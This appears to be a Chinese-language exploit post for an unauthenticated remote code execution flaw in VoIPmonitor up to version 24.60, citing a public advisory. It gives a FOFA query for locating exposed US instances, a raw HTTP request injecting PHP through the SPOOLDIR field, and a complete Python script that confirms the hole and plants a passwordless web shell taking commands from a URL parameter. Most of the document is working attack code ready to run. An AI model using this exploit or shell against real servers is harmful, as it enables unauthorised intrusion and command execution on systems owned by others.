VoIPmonitor UnAuth RCE
=========================
原文链接:
https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
FOFA:
title="VoIPmonitor" && country="US"
受影响的版本:
VoIPmonitor <= 24.60,漏洞分析见原文链接。
POC:
POST /index.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,vi;q=0.8,id;q=0.7,ja;q=0.6,zh-TW;q=0.5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

SPOOLDIR=test%22.system%28id%29.%22
原文给的脚本:
import argparse
import random
import secrets
import string
import time
from sys import argv,exit
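try:
    import requests
except ImportError:
    # Nothing below works without requests; the original only printed the
    # hint and then died later with a NameError on the first requests.post().
    print("pip3 install requests ")
    raise SystemExit(1)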
# Banner printed once at import/start-up (text kept verbatim).
_BANNER = """
###############################################
# VOIP Monitor RCE #
###############################################
"""
print(_BANNER)

# Headers shared by every request the script sends. The form-urlencoded
# Content-Type is what lets the PHP side see the SPOOLDIR/recheck fields
# as POST parameters; the rest just makes the traffic look like a browser.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0",
    "Accept": "*/*",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Connection": "close",
}
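def get_target(args):
    """Build the URL of the vulnerable index.php from the parsed CLI args.

    Args:
        args: argparse namespace with ``host`` (target host[:port]) and
            ``path`` (optional sub-directory the web UI lives under, or None).

    Returns:
        ``http://<host>/index.php`` when no path is given, otherwise
        ``http://<host>/<path>/index.php``. Leading/trailing slashes on
        ``path`` are dropped, so ``-b /voipmonitor/`` no longer yields a
        ``http://host//voipmonitor//index.php`` URL as the original did.
    """
    hostname = args.host
    # args.path is None when -b/--path was not passed.
    sub_path = (args.path or "").strip("/")
    if sub_path:
        return f"http://{hostname}/{sub_path}/index.php"
    return f"http://{hostname}/index.php"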
def set_tmp(args):
    """POST ``SPOOLDIR=/tmp`` to the target's index.php.

    The exploit payloads overwrite the SPOOLDIR value with injected PHP, so
    main() calls this before and after each injection — presumably to leave
    a plain value in the saved config (the advisory script does the same).
    Prints the response object and returns None.
    """
    url = get_target(args)
    form = {"SPOOLDIR": "/tmp", "recheck": "annen"}
    reply = requests.post(url, form, headers=headers)
    print(f"[*] set /tmp {reply}")
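def checkVulnerability(args):
    """Probe the target with a ``system(id)`` injection in SPOOLDIR.

    Posts ``SPOOLDIR=test".system(id)."`` to index.php and looks for
    ``uid=`` in the response body. On a hit prints "[*] host is vulnerable"
    and returns; otherwise prints "[-] host is not vulnerable" and exits
    with status 1 so callers can tell the two outcomes apart (the original
    exited with status 0 in both cases).

    Args:
        args: argparse namespace with ``host`` and ``path``.
    """
    target = get_target(args)
    print(f"[+] Attacking {target}")
    # NOTE(review): `id` is an unquoted bare word inside the injected PHP.
    # Older PHP degrades an undefined constant to the string "id"; PHP 8
    # raises an Error instead, so this probe may miss PHP 8 hosts — confirm
    # against the target before trusting a "not vulnerable" result.
    testcmd = {"SPOOLDIR": "test\".system(id).\"", "recheck": "annen"}
    marker = b"uid="
    probe = requests.post(target, testcmd, verify=False, headers=headers)
    if marker in probe.content:
        print("[*] host is vulnerable")
        return
    print("[-] host is not vulnerable")
    exit(1)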
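def uploadshell(args):
    """Inject a PHP ``file_put_contents`` into SPOOLDIR to drop a web shell.

    The injected PHP writes ``<random>.php`` with a relative name, so the
    file lands in whatever directory the target's PHP process runs in —
    the script assumes that is the web root and fetches the shell back as
    ``http://<host>/[<path>/]<random>.php``.

    The dropped shell runs ``system($_GET["a"])`` with NO authentication:
    ``a`` is just the parameter carrying the command, not a password, so
    anyone who learns the URL can run commands as the web-server user.
    Delete it as soon as the engagement no longer needs it.

    Args:
        args: argparse namespace with ``host`` and ``path``.

    Prints the upload status code, the output of a test ``id`` command and
    the shell URL; returns None.
    """
    target = get_target(args)
    # secrets.choice rather than random.choice: the unguessable file name is
    # the only thing keeping third parties from finding the open shell.
    shellfilename = "".join(secrets.choice(string.ascii_lowercase) for _ in range(10))
    rce_payload = {
        "SPOOLDIR": f"/tmp\".file_put_contents('{shellfilename}.php','<?php echo system($_GET[\"a\"]);').\"",
        "recheck": "annen",
    }
    rce_req = requests.post(target, headers=headers, data=rce_payload)
    print(f"[*] uploading shell {rce_req.status_code}")
    # Derive the shell URL from the exploit URL (which always ends in
    # index.php) so host/path are joined exactly the same way in both.
    shell_path = target[: -len("index.php")] + f"{shellfilename}.php"
    shell_check = requests.get(shell_path, headers=headers, params={"a": "id"})
    print(f"[*] RCE Check : {shell_check.text}")
    print(f"[*] Your Shell at {shell_path}")
    print("[!] The shell has no password - remove it from the target when you are done")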
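def main():
    """Parse the command line and run the full exploit chain.

    Flow (same as the advisory script): reset SPOOLDIR to /tmp, probe for
    the injection, reset again, drop the web shell, reset once more —
    presumably so the saved config ends with a plain SPOOLDIR rather than
    one of the injected payloads.

    ``-t/--host`` is now required: without it the original silently built
    ``http://None/index.php`` and failed with a confusing connection error.
    """
    parser = argparse.ArgumentParser(description='VoIP Monitor all versions command execution')
    parser.add_argument('-t', '--host', help='Host', type=str, required=True)
    parser.add_argument('-b', '--path', help='Path of the VoIP Monitor', type=str)
    args = parser.parse_args()
    set_tmp(args)
    checkVulnerability(args)
    set_tmp(args)
    uploadshell(args)
    set_tmp(args)


if __name__ == "__main__":
    main()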
脚本会上传一个一句话木马,要执行的命令通过 GET 参数 a 传入。注意:这里的 a 不是密码,该 webshell 没有任何认证,任何知道 URL 的人都能以 Web 服务用户身份执行命令,测试结束后务必删除:
http://x.x.x.x/twyongzyih.php?a=ifconfig